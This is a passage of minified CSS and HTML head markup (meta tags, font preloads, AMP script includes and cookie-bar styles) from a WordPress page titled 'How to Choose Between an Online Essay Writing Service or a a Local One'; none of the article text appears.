#dfdfdf}:where(amp-accordion>section)>:last-child{margin:0}}amp-accordion>section{float:none!important}amp-accordion>section>*{float:none!important;display:block!important;overflow:hidden!important;position:relative!important}amp-accordion,amp-accordion>section{margin:0}amp-accordion:not(.i-amphtml-built)>section>:last-child{display:none!important}amp-accordion:not(.i-amphtml-built)>section[expanded]>:last-child{display:block!important} /*# sourceURL=/css/ampshared.css*/</style><meta name="amp-to-amp-navigation" content="AMP-Redirect-To; AMP.navigateTo"><meta name="robots" content="max-image-preview:large"><meta name="generator" content="WordPress 6.1.1"><meta property="og:title" content="How to Choose Between an Online Essay Writing Service or a a Local One"><meta property="og:description" content=""><meta name="twitter:card" content="summary_large_image"><meta name="twitter:title" content="How to Choose Between an Online Essay Writing Service or a a Local One"><meta name="twitter:description" content=""><meta name="generator" content="AMP Plugin v2.4.1; mode=transitional"><meta name="msapplication-TileImage" content="https://paramenino.com/wp-content/uploads/2021/09/cropped-default-1-270x270.png"><link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin=""><link rel="dns-prefetch" href="//fonts.googleapis.com"><link rel="preload" href="https://paramenino.com/wp-content/themes/newsever/assets/font-awesome/fonts/fontawesome-webfont.eot#iefix&v=4.7.0" as="font" crossorigin=""><link rel="preload" href="https://paramenino.com/wp-content/themes/newsever/assets/bootstrap/fonts/glyphicons-halflings-regular.eot#iefix" as="font" crossorigin=""><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin=""><link rel="dns-prefetch" href="https://fonts.gstatic.com"><script async="" src="https://cdn.ampproject.org/v0.mjs" type="module" crossorigin="anonymous"></script><script async nomodule src="https://cdn.ampproject.org/v0.js" crossorigin="anonymous"></script><script src="https://cdn.ampproject.org/v0/amp-form-0.1.mjs" async="" custom-element="amp-form" type="module" crossorigin="anonymous"></script><script async nomodule src="https://cdn.ampproject.org/v0/amp-form-0.1.js" crossorigin="anonymous" custom-element="amp-form"></script><link rel="icon" href="https://paramenino.com/wp-content/uploads/2021/09/cropped-default-1-32x32.png" sizes="32x32"><link rel="icon" href="https://paramenino.com/wp-content/uploads/2021/09/cropped-default-1-192x192.png" sizes="192x192"><link crossorigin="anonymous" rel="stylesheet" id="newsever-google-fonts-css" href="https://fonts.googleapis.com/css?family=Roboto:100,300,400,500,700%7CBarlow:ital,wght@0,400;0,500;0,600;0,700;0,800;0,900;1,300;1,400;1,500;1,600;1,700;1,800%7CBarlow%20Semi%20Condensed:ital,wght@0,300;0,400;0,500;0,600;0,700;1,300;1,400;1,500;1,600;1,700&subset=latin,latin-ext" type="text/css" media="all"><style amp-custom="">amp-img.amp-wp-enforced-sizes{object-fit:contain}amp-img img,amp-img noscript{image-rendering:inherit;object-fit:inherit;object-position:inherit}:where(.wp-block-button__link){box-shadow:none;text-decoration:none;border-radius:9999px;padding:calc(.667em + 2px) calc(1.333em + 2px)}:where(.wp-block-columns.has-background){padding:1.25em 2.375em}:where(.wp-block-post-comments input[type=submit]){border:none}:where(.wp-block-file__button){border-radius:2em;padding:.5em 1em}:where(.wp-block-file__button):is(a):active,:where(.wp-block-file__button):is(a):focus,:where(.wp-block-file__button):is(a):hover,:where(.wp-block-file__button):is(a):visited{box-shadow:none;color:#fff;opacity:.85;text-decoration:none}ul{box-sizing:border-box}:where(.wp-block-navigation.has-background .wp-block-navigation-item a:not(.wp-element-button)),:where(.wp-block-navigation.has-background .wp-block-navigation-submenu a:not(.wp-element-button)),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-item a:not(.wp-element-button)),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-submenu a:not(.wp-element-button)){padding:.5em 1em}@keyframes overlay-menu__fade-in-animation{0%{opacity:0;transform:translateY(.5em)}to{opacity:1;transform:translateY(0)}}:where(p.has-text-color:not(.has-link-color)) a{color:inherit}:where(.wp-block-search__button){border:1px solid #ccc;padding:.375em .625em}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper){padding:4px;border:1px solid #949494}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) :where(.wp-block-search__button){padding:.125em .5em}:root{--wp--preset--font-size--normal:16px;--wp--preset--font-size--huge:42px}.screen-reader-text{border:0;clip:rect(1px,1px,1px,1px);clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px}.screen-reader-text:not(#_#_#_#_#_#_#_){word-wrap:normal}.screen-reader-text:focus{background-color:#ddd;clip-path:none;color:#444;display:block;font-size:1em;height:auto;left:5px;line-height:normal;padding:15px 23px 14px;text-decoration:none;top:5px;width:auto;z-index:100000}.screen-reader-text:focus:not(#_#_#_#_#_#_#_){clip:auto}html :where(.has-border-color){border-style:solid}html :where([data-amp-original-style*=border-top-color]){border-top-style:solid}html :where([data-amp-original-style*=border-right-color]){border-right-style:solid}html :where([data-amp-original-style*=border-bottom-color]){border-bottom-style:solid}html :where([data-amp-original-style*=border-left-color]){border-left-style:solid}html :where([data-amp-original-style*=border-width]){border-style:solid}html :where([data-amp-original-style*=border-top-width]){border-top-style:solid}html :where([data-amp-original-style*=border-right-width]){border-right-style:solid}html :where([data-amp-original-style*=border-bottom-width]){border-bottom-style:solid}html :where([data-amp-original-style*=border-left-width]){border-left-style:solid}html :where(amp-img[class*=wp-image-]),html :where(amp-anim[class*=wp-image-]){height:auto;max-width:100%}body{--wp--preset--color--black:#000;--wp--preset--color--cyan-bluish-gray:#abb8c3;--wp--preset--color--white:#fff;--wp--preset--color--pale-pink:#f78da7;--wp--preset--color--vivid-red:#cf2e2e;--wp--preset--color--luminous-vivid-orange:#ff6900;--wp--preset--color--luminous-vivid-amber:#fcb900;--wp--preset--color--light-green-cyan:#7bdcb5;--wp--preset--color--vivid-green-cyan:#00d084;--wp--preset--color--pale-cyan-blue:#8ed1fc;--wp--preset--color--vivid-cyan-blue:#0693e3;--wp--preset--color--vivid-purple:#9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple:linear-gradient(135deg,rgba(6,147,227,1) 0%,#9b51e0 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan:linear-gradient(135deg,#7adcb4 0%,#00d082 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange:linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red:linear-gradient(135deg,rgba(255,105,0,1) 0%,#cf2e2e 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray:linear-gradient(135deg,#eee 0%,#a9b8c3 100%);--wp--preset--gradient--cool-to-warm-spectrum:linear-gradient(135deg,#4aeadc 0%,#9778d1 20%,#cf2aba 40%,#ee2c82 60%,#fb6962 80%,#fef84c 100%);--wp--preset--gradient--blush-light-purple:linear-gradient(135deg,#ffceec 0%,#9896f0 100%);--wp--preset--gradient--blush-bordeaux:linear-gradient(135deg,#fecda5 0%,#fe2d2d 50%,#6b003e 100%);--wp--preset--gradient--luminous-dusk:linear-gradient(135deg,#ffcb70 0%,#c751c0 50%,#4158d0 100%);--wp--preset--gradient--pale-ocean:linear-gradient(135deg,#fff5cb 0%,#b6e3d4 50%,#33a7b5 100%);--wp--preset--gradient--electric-grass:linear-gradient(135deg,#caf880 0%,#71ce7e 100%);--wp--preset--gradient--midnight:linear-gradient(135deg,#020381 0%,#2874fc 100%);--wp--preset--duotone--dark-grayscale:url("#wp-duotone-dark-grayscale");--wp--preset--duotone--grayscale:url("#wp-duotone-grayscale");--wp--preset--duotone--purple-yellow:url("#wp-duotone-purple-yellow");--wp--preset--duotone--blue-red:url("#wp-duotone-blue-red");--wp--preset--duotone--midnight:url("#wp-duotone-midnight");--wp--preset--duotone--magenta-yellow:url("#wp-duotone-magenta-yellow");--wp--preset--duotone--purple-green:url("#wp-duotone-purple-green");--wp--preset--duotone--blue-orange:url("#wp-duotone-blue-orange");--wp--preset--font-size--small:13px;--wp--preset--font-size--medium:20px;--wp--preset--font-size--large:36px;--wp--preset--font-size--x-large:42px;--wp--preset--spacing--20:.44rem;--wp--preset--spacing--30:.67rem;--wp--preset--spacing--40:1rem;--wp--preset--spacing--50:1.5rem;--wp--preset--spacing--60:2.25rem;--wp--preset--spacing--70:3.38rem;--wp--preset--spacing--80:5.06rem}:where(.is-layout-flex){gap:.5em}:where(.wp-block-columns.is-layout-flex){gap:2em}:where(.wp-block-columns.is-layout-flex){gap:2em}@keyframes spin{from{transform:rotate(0deg)}to{transform:rotate(360deg)}}@keyframes blink{from{opacity:0}50%{opacity:1}to{opacity:0}}#cookie-law-info-bar{font-size:15px;margin:0 auto;padding:12px 10px;position:absolute;text-align:center;box-sizing:border-box;width:100%;z-index:9999;display:none;left:0px;font-weight:300;box-shadow:0 -1px 10px 0 rgba(172,171,171,.3)}#cookie-law-info-again{font-size:10pt;margin:0;padding:5px 10px;text-align:center;z-index:9999;cursor:pointer;box-shadow:#161616 2px 2px 5px 2px}#cookie-law-info-bar span{vertical-align:middle}.cli-plugin-button,.cli-plugin-button:visited{display:inline-block;padding:9px 12px;color:#fff;text-decoration:none;text-decoration:none;position:relative;cursor:pointer;margin-left:5px}.cli-plugin-button:hover{background-color:#111;color:#fff;text-decoration:none}.cli-plugin-button,.cli-plugin-button:visited,.medium.cli-plugin-button,.medium.cli-plugin-button:visited{font-size:13px;font-weight:400;line-height:1}.cli-plugin-button{margin-top:5px}.cli-bar-popup{-moz-background-clip:padding;-webkit-background-clip:padding;background-clip:padding-box;-webkit-border-radius:30px;-moz-border-radius:30px;border-radius:30px;padding:20px}.cli-container-fluid{padding-right:15px;padding-left:15px;margin-right:auto;margin-left:auto}.cli-row{display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;margin-right:-15px;margin-left:-15px}.cli-align-items-stretch:not(#_#_#_#_#_#_#_){-ms-flex-align:stretch;align-items:stretch}.cli-px-0{padding-left:0;padding-right:0}.cli-btn{cursor:pointer;font-size:14px;display:inline-block;font-weight:400;text-align:center;white-space:nowrap;vertical-align:middle;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;border:1px solid transparent;padding:.5rem 1.25rem;line-height:1;border-radius:.25rem;transition:all .15s ease-in-out}.cli-btn:hover{opacity:.8}.cli-btn:focus{outline:0}.cli-modal.cli-fade .cli-modal-dialog{transition:-webkit-transform .3s ease-out;transition:transform .3s ease-out;transition:transform .3s ease-out,-webkit-transform .3s ease-out;-webkit-transform:translate(0,-25%);transform:translate(0,-25%)}.cli-modal-backdrop{position:fixed;top:0;right:0;bottom:0;left:0;z-index:1040;background-color:#000;display:none}.cli-modal-backdrop.cli-fade{opacity:0}.cli-modal a{text-decoration:none}.cli-modal .cli-modal-dialog{position:relative;width:auto;margin:.5rem;pointer-events:none;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";font-size:1rem;font-weight:400;line-height:1.5;color:#212529;text-align:left;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;min-height:calc(100% - ( .5rem * 2 ))}@media (min-width: 576px){.cli-modal .cli-modal-dialog{max-width:500px;margin:1.75rem auto;min-height:calc(100% - ( 1.75rem * 2 ))}}@media (min-width: 992px){.cli-modal .cli-modal-dialog{max-width:900px}}.cli-modal-content{position:relative;display:-ms-flexbox;display:flex;-ms-flex-direction:column;flex-direction:column;width:100%;pointer-events:auto;background-color:#fff;background-clip:padding-box;border-radius:.3rem;outline:0}.cli-modal .cli-modal-close{position:absolute;right:10px;top:10px;z-index:1;padding:0;border:0;-webkit-appearance:none;font-size:1.5rem;font-weight:700;line-height:1;color:#000;text-shadow:0 1px 0 #fff}.cli-modal .cli-modal-close:not(#_#_#_#_#_#_#_){background-color:transparent}.cli-modal .cli-modal-close:focus{outline:0}.cli-switch{display:inline-block;position:relative;min-height:1px;padding-left:70px;font-size:14px}.cli-switch input[type="checkbox"]{display:none}.cli-switch .cli-slider{background-color:#e3e1e8;height:24px;width:50px;bottom:0;cursor:pointer;left:0;position:absolute;right:0;top:0;transition:.4s}.cli-switch .cli-slider:before{background-color:#fff;bottom:2px;content:"";height:20px;left:2px;position:absolute;transition:.4s;width:20px}.cli-switch input:checked + .cli-slider{background-color:#00acad}.cli-switch input:checked + .cli-slider:before{transform:translateX(26px)}.cli-switch .cli-slider{border-radius:34px}.cli-switch .cli-slider:before{border-radius:50%}.cli-tab-content{background:#fff}.cli-fade{transition:opacity .15s linear}.cli-tab-content{width:100%;padding:30px}@media (max-width: 767px){.cli-tab-content{padding:30px 10px}}.cli-tab-content p{color:#343438;font-size:14px;margin-top:0}.cli-tab-content h4{font-size:20px;margin-bottom:1.5rem;margin-top:0;font-family:inherit;font-weight:500;line-height:1.2;color:inherit}.cli-container-fluid{padding-right:15px;padding-left:15px;margin-right:auto;margin-left:auto}.cli-row{display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;margin-right:-15px;margin-left:-15px}.cli-align-items-stretch:not(#_#_#_#_#_#_#_){-ms-flex-align:stretch;align-items:stretch}.cli-px-0{padding-left:0;padding-right:0}.cli-btn{cursor:pointer;font-size:14px;display:inline-block;font-weight:400;text-align:center;white-space:nowrap;vertical-align:middle;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;border:1px solid transparent;padding:.5rem 1.25rem;line-height:1;border-radius:.25rem;transition:all .15s ease-in-out}.cli-btn:hover{opacity:.8}.cli-btn:focus{outline:0}.cli-modal.cli-fade .cli-modal-dialog{transition:-webkit-transform .3s ease-out;transition:transform .3s ease-out;transition:transform .3s ease-out,-webkit-transform .3s ease-out;-webkit-transform:translate(0,-25%);transform:translate(0,-25%)}.cli-modal-backdrop{position:fixed;top:0;right:0;bottom:0;left:0;z-index:1040;background-color:#000;-webkit-transform:scale(0);transform:scale(0);transition:opacity ease-in-out .5s}.cli-modal-backdrop.cli-fade{opacity:0}.cli-modal{position:fixed;top:0;right:0;bottom:0;left:0;z-index:99999;transform:scale(0);overflow:hidden;outline:0;display:none}.cli-modal a{text-decoration:none}.cli-modal .cli-modal-dialog{position:relative;width:auto;margin:.5rem;pointer-events:none;font-family:inherit;font-size:1rem;font-weight:400;line-height:1.5;color:#212529;text-align:left;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;min-height:calc(100% - ( .5rem * 2 ))}@media (min-width: 576px){.cli-modal .cli-modal-dialog{max-width:500px;margin:1.75rem auto;min-height:calc(100% - ( 1.75rem * 2 ))}}.cli-modal-content{position:relative;display:-ms-flexbox;display:flex;-ms-flex-direction:column;flex-direction:column;width:100%;pointer-events:auto;background-color:#fff;background-clip:padding-box;border-radius:.2rem;box-sizing:border-box;outline:0}.cli-modal .cli-modal-close:focus{outline:0}.cli-switch{display:inline-block;position:relative;min-height:1px;padding-left:38px;font-size:14px}.cli-switch input[type="checkbox"]{display:none}.cli-switch .cli-slider{background-color:#e3e1e8;height:20px;width:38px;bottom:0;cursor:pointer;left:0;position:absolute;right:0;top:0;transition:.4s}.cli-switch .cli-slider:before{background-color:#fff;bottom:2px;content:"";height:15px;left:3px;position:absolute;transition:.4s;width:15px}.cli-switch input:checked + .cli-slider{background-color:#61a229}.cli-switch input:checked + .cli-slider:before{transform:translateX(18px)}.cli-switch .cli-slider{border-radius:34px;font-size:0}.cli-switch .cli-slider:before{border-radius:50%}.cli-tab-content{background:#fff}.cli-tab-content{width:100%;padding:5px 30px 5px 5px;box-sizing:border-box}@media (max-width: 767px){.cli-tab-content{padding:30px 10px}}.cli-tab-content p{color:#343438;font-size:14px;margin-top:0}.cli-tab-content h4{font-size:20px;margin-bottom:1.5rem;margin-top:0;font-family:inherit;font-weight:500;line-height:1.2;color:inherit}#cookie-law-info-bar .cli-tab-content{background:transparent}#cookie-law-info-bar .cli-nav-link,#cookie-law-info-bar .cli-tab-container p,#cookie-law-info-bar span.cli-necessary-caption,#cookie-law-info-bar .cli-switch .cli-slider:after{color:inherit}#cookie-law-info-bar .cli-tab-header a:before{border-right:1px solid currentColor;border-bottom:1px solid currentColor}#cookie-law-info-bar .cli-row{margin-top:20px}#cookie-law-info-bar .cli-tab-content h4{margin-bottom:.5rem}#cookie-law-info-bar .cli-tab-container{display:none;text-align:left}.cli-tab-footer .cli-btn{background-color:#00acad;padding:10px 15px;text-decoration:none}.cli-tab-footer .wt-cli-privacy-accept-btn{background-color:#61a229;color:#fff;border-radius:0}.cli-tab-footer{width:100%;text-align:right;padding:20px 0}.cli-col-12{width:100%}.cli-tab-header{display:flex;justify-content:space-between}.cli-tab-header a:before{width:10px;height:2px;left:0;top:calc(50% - 1px)}.cli-tab-header a:after{width:2px;height:10px;left:4px;top:calc(50% - 5px);-webkit-transform:none;transform:none}.cli-tab-header a:before{width:7px;height:7px;border-right:1px solid #4a6e78;border-bottom:1px solid #4a6e78;content:" ";transform:rotate(-45deg);-webkit-transition:all .2s ease-in-out;-moz-transition:all .2s ease-in-out;transition:all .2s ease-in-out;margin-right:10px}.cli-tab-header a.cli-nav-link{position:relative;display:flex;align-items:center;font-size:14px;color:#000;text-transform:capitalize}.cli-tab-header{border-radius:5px;padding:12px 15px;cursor:pointer;transition:background-color .2s ease-out .3s,color .2s ease-out 0s;background-color:#f2f2f2}.cli-modal .cli-modal-close{position:absolute;right:0;top:0;z-index:1;-webkit-appearance:none;width:40px;height:40px;padding:0;padding:10px;border-radius:50%;background:transparent;border:none;min-width:40px}.cli-tab-container h4,.cli-tab-container h1{font-family:inherit;font-size:16px;margin-bottom:15px;margin:10px 0}#cliSettingsPopup .cli-tab-section-container{padding-top:12px}.cli-tab-container p,.cli-privacy-content-text{font-size:14px;line-height:1.4;margin-top:0;padding:0;color:#000}.cli-tab-content{display:none}.cli-tab-section .cli-tab-content{padding:10px 20px 5px 20px}.cli-tab-section{margin-top:5px}@media (min-width: 992px){.cli-modal .cli-modal-dialog{max-width:645px}}.cli-switch .cli-slider:after{content:attr(data-cli-disable);position:absolute;right:50px;color:#000;font-size:12px;text-align:right;min-width:80px}.cli-switch input:checked + .cli-slider:after{content:attr(data-cli-enable)}.cli-privacy-overview:not(.cli-collapsed) .cli-privacy-content{max-height:60px;transition:max-height .15s ease-out;overflow:hidden}a.cli-privacy-readmore{font-size:12px;margin-top:12px;display:inline-block;padding-bottom:0;cursor:pointer;color:#000;text-decoration:underline}.cli-modal-footer{position:relative}a.cli-privacy-readmore:before{content:attr(data-readmore-text)}.cli-privacy-content p{margin-bottom:0}.cli-modal-close svg{fill:#000}span.cli-necessary-caption{color:#000;font-size:12px}#cookie-law-info-bar .cli-privacy-overview{display:none}.cli-tab-container .cli-row{max-height:500px;overflow-y:auto}@keyframes blowUpContent{0%{transform:scale(1);opacity:1}99.9%{transform:scale(2);opacity:0}100%{transform:scale(0)}}@keyframes blowUpContentTwo{0%{transform:scale(2);opacity:0}100%{transform:scale(1);opacity:1}}@keyframes blowUpModal{0%{transform:scale(0)}100%{transform:scale(1)}}@keyframes blowUpModalTwo{0%{transform:scale(1);opacity:1}50%{transform:scale(.5);opacity:0}100%{transform:scale(0);opacity:0}}.cli-tab-section .cookielawinfo-row-cat-table td,.cli-tab-section .cookielawinfo-row-cat-table th{font-size:12px}.cli_settings_button{cursor:pointer}.wt-cli-sr-only{display:none;font-size:16px}.cli-bar-container{float:none;margin:0 auto;display:-webkit-box;display:-moz-box;display:-ms-flexbox;display:-webkit-flex;display:flex;justify-content:space-between;-webkit-box-align:center;-moz-box-align:center;-ms-flex-align:center;-webkit-align-items:center;align-items:center}.cli-bar-btn_container{margin-left:20px;display:-webkit-box;display:-moz-box;display:-ms-flexbox;display:-webkit-flex;display:flex;-webkit-box-align:center;-moz-box-align:center;-ms-flex-align:center;-webkit-align-items:center;align-items:center;flex-wrap:nowrap}.cli-style-v2 a{cursor:pointer}.cli-bar-btn_container a{white-space:nowrap}.cli-style-v2{font-size:11pt;line-height:18px;font-weight:normal}.cli-style-v2 .cli-bar-message{width:70%;text-align:left}.cli-style-v2 .cli-bar-btn_container .cli_action_button,.cli-style-v2 .cli-bar-btn_container .cli_settings_button{margin-left:5px}.cli-style-v2 .cli_settings_button:not(.cli-plugin-button),.cli-style-v2 .cli_action_button:not(.cli-plugin-button){text-decoration:underline}.cli-style-v2 .cli-bar-btn_container .cli-plugin-button{margin-top:5px;margin-bottom:5px}.wt-cli-necessary-checkbox:not(#_#_#_#_#_#_#_){display:none}@media (max-width: 985px){.cli-style-v2 .cli-bar-message{width:100%}.cli-style-v2.cli-bar-container{justify-content:left;flex-wrap:wrap}.cli-style-v2 .cli-bar-btn_container{margin-left:0px;margin-top:10px}}.wt-cli-privacy-overview-actions{padding-bottom:0}@media only screen and (max-width: 479px) and (min-width: 320px){.cli-style-v2 .cli-bar-btn_container{flex-wrap:wrap}}.wt-cli-cookie-description{font-size:14px;line-height:1.4;margin-top:0;padding:0;color:#000}@font-face{font-family:"FontAwesome";src:url("https://paramenino.com/wp-content/themes/newsever/assets/font-awesome/fonts/fontawesome-webfont.eot?v=4.7.0");src:url("https://paramenino.com/wp-content/themes/newsever/assets/font-awesome/fonts/fontawesome-webfont.eot#iefix&v=4.7.0") format("embedded-opentype"),url("https://paramenino.com/wp-content/themes/newsever/assets/font-awesome/fonts/fontawesome-webfont.woff2?v=4.7.0") format("woff2"),url("https://paramenino.com/wp-content/themes/newsever/assets/font-awesome/fonts/fontawesome-webfont.woff?v=4.7.0") format("woff"),url("https://paramenino.com/wp-content/themes/newsever/assets/font-awesome/fonts/fontawesome-webfont.ttf?v=4.7.0") format("truetype"),url("https://paramenino.com/wp-content/themes/newsever/assets/font-awesome/fonts/fontawesome-webfont.svg?v=4.7.0#fontawesomeregular") format("svg");font-weight:normal;font-style:normal}.fa{display:inline-block;font:normal normal normal 14px/1 FontAwesome;font-size:inherit;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}@-webkit-keyframes fa-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@keyframes fa-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}.fa-search:before{content:""}.fa-home:before{content:""}.fa-clock-o:before{content:""}.fa-pencil-square-o:before{content:""}.fa-angle-up:before{content:""}.fa-youtube-play:before{content:""}html{font-family:sans-serif;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}body{margin:0}article,aside,footer,header,main,nav{display:block}[hidden]{display:none}a{background-color:transparent}a:active,a:hover{outline:0}h1{margin:.67em 0;font-size:2em}amp-img{border:0}svg:not(:root){overflow:hidden}button,input{margin:0;font:inherit;color:inherit}button{overflow:visible}button{text-transform:none}button,html input[type=button],input[type=reset],input[type=submit]{-webkit-appearance:button;cursor:pointer}button[disabled],html input[disabled]{cursor:default}button::-moz-focus-inner,input::-moz-focus-inner{padding:0;border:0}input{line-height:normal}input[type=checkbox],input[type=radio]{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;padding:0}input[type=number]::-webkit-inner-spin-button,input[type=number]::-webkit-outer-spin-button{height:auto}input[type=search]{-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-appearance:textfield}input[type=search]::-webkit-search-cancel-button,input[type=search]::-webkit-search-decoration{-webkit-appearance:none}table{border-spacing:0;border-collapse:collapse}td,th{padding:0}@media print{*:not(#_#_#_#_#_#_),:after:not(#_#_#_#_#_#_#_#_),:before:not(#_#_#_#_#_#_#_#_){color:#000;text-shadow:none;background:0 0;-webkit-box-shadow:none;box-shadow:none}a,a:visited{text-decoration:underline}a[href]:after{content:" (" attr(href) ")"}a[href^="javascript:"]:after,a[href^="#"]:after{content:""}thead{display:table-header-group}amp-img,tr{page-break-inside:avoid}amp-img:not(#_#_#_#_#_#_#_#_){max-width:100%}h2,p{orphans:3;widows:3}h2{page-break-after:avoid}}@font-face{font-family:"Glyphicons Halflings";src:url("https://paramenino.com/wp-content/themes/newsever/assets/bootstrap/fonts/glyphicons-halflings-regular.eot");src:url("https://paramenino.com/wp-content/themes/newsever/assets/bootstrap/fonts/glyphicons-halflings-regular.eot#iefix") format("embedded-opentype"),url("https://paramenino.com/wp-content/themes/newsever/assets/bootstrap/fonts/glyphicons-halflings-regular.woff2") format("woff2"),url("https://paramenino.com/wp-content/themes/newsever/assets/bootstrap/fonts/glyphicons-halflings-regular.woff") format("woff"),url("https://paramenino.com/wp-content/themes/newsever/assets/bootstrap/fonts/glyphicons-halflings-regular.ttf") format("truetype"),url("https://paramenino.com/wp-content/themes/newsever/assets/bootstrap/fonts/glyphicons-halflings-regular.svg#glyphicons_halflingsregular") format("svg")}*{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}:after,:before{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}html{font-size:10px;-webkit-tap-highlight-color:rgba(0,0,0,0)}body{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;font-size:14px;line-height:1.42857143;color:#333;background-color:#fff}button,input{font-family:inherit;font-size:inherit;line-height:inherit}a{color:#337ab7;text-decoration:none}a:focus,a:hover{color:#23527c;text-decoration:underline}a:focus{outline:thin dotted;outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}amp-img{vertical-align:middle}[role=button]{cursor:pointer}h1,h2,h4{font-family:inherit;font-weight:500;line-height:1.1;color:inherit}h1,h2{margin-top:20px;margin-bottom:10px}h4{margin-top:10px;margin-bottom:10px}h1{font-size:36px}h2{font-size:30px}h4{font-size:18px}p{margin:0 0 10px}ul{margin-top:0;margin-bottom:10px}ul ul{margin-bottom:0}table{background-color:transparent}th{text-align:left}table td[class*=col-],table th[class*=col-]{position:static;display:table-cell;float:none}label{display:inline-block;max-width:100%;margin-bottom:5px;font-weight:700}input[type=search]{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}input[type=checkbox],input[type=radio]{margin:4px 0 0;margin-top:1px \9;line-height:normal}input[type=file]{display:block}input[type=range]{display:block;width:100%}input[type=file]:focus,input[type=checkbox]:focus,input[type=radio]:focus{outline:thin dotted;outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}input[type=search]{-webkit-appearance:none}input[type=checkbox][disabled],input[type=radio][disabled]{cursor:not-allowed}@-webkit-keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}@-o-keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}@keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}.clearfix:after,.clearfix:before{display:table;content:" "}.clearfix:after{clear:both}button::-moz-focus-inner{padding:0;border:0}html{font-family:"Roboto",sans-serif;font-size:100%;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}body{margin:0}article,aside,footer,header,main,nav{display:block}[hidden]{display:none}a{background-color:transparent}a:active,a:hover{outline:0}h1{font-size:2em;margin:.67em 0}amp-img{border:0}svg:not(:root){overflow:hidden}button,input{color:inherit;font:inherit;margin:0}button{overflow:visible}button{text-transform:none}button,html input[type="button"],input[type="reset"],input[type="submit"]{-webkit-appearance:button;cursor:pointer}button[disabled],html input[disabled]{cursor:default}button::-moz-focus-inner,input::-moz-focus-inner{border:0;padding:0}input{line-height:normal}input[type=file]{border:1px solid #767676;padding:10px;border-radius:3px}input[type="checkbox"],input[type="radio"]{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;padding:0;display:inline-block;vertical-align:middle;margin:0 0 2px}input[type="number"]::-webkit-inner-spin-button,input[type="number"]::-webkit-outer-spin-button{height:auto}input[type="search"]::-webkit-search-cancel-button,input[type="search"]::-webkit-search-decoration{-webkit-appearance:none}table{border-collapse:collapse;border-spacing:0}td,th{padding:0}body,button,input{color:#4a4a4a;font-family:"Roboto",sans-serif;font-size:16px;line-height:1.7}h1,h2,h4{clear:both;color:#000}.site-title,h1,h2,h4{font-family:"Barlow",sans-serif;font-weight:600}.read-title h4{font-family:"Barlow Semi Condensed",sans-serif}p{margin-bottom:15px;font-family:"Roboto",sans-serif}i{font-style:italic}html{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}*,*:before,*:after{box-sizing:inherit}body{background-color:#fbfbfb}ul{margin:0;padding:0;list-style:none}li > ul{margin-bottom:0;margin-left:1.5em}amp-img{height:auto;max-width:100%}table{margin:0 0 1.5em;width:100%}@-webkit-keyframes spin-left{0%,25%{-webkit-transform:rotate(-225deg);transform:rotate(-225deg);visibility:hidden}50%,75%{-webkit-transform:rotate(-45deg);transform:rotate(-45deg)}100%{-webkit-transform:rotate(135deg);transform:rotate(135deg)}}@keyframes spin-left{0%,25%{-webkit-transform:rotate(-225deg);transform:rotate(-225deg);visibility:hidden}50%,75%{-webkit-transform:rotate(-45deg);transform:rotate(-45deg)}100%{-webkit-transform:rotate(135deg);transform:rotate(135deg)}}@-webkit-keyframes spin-right{0%{-webkit-transform:rotate(-225deg);transform:rotate(-225deg)}25%,50%{-webkit-transform:rotate(-45deg);transform:rotate(-45deg)}75%,100%{-webkit-transform:rotate(135deg);transform:rotate(135deg);visibility:hidden}}@keyframes spin-right{0%{-webkit-transform:rotate(-225deg);transform:rotate(-225deg)}25%,50%{-webkit-transform:rotate(-45deg);transform:rotate(-45deg)}75%,100%{-webkit-transform:rotate(135deg);transform:rotate(135deg);visibility:hidden}}a{color:#404040;text-decoration:none}a:visited{color:#404040}a:hover,a:focus,a:active{color:#1c1c1c;outline:0;text-decoration:none}a:focus{outline:1px 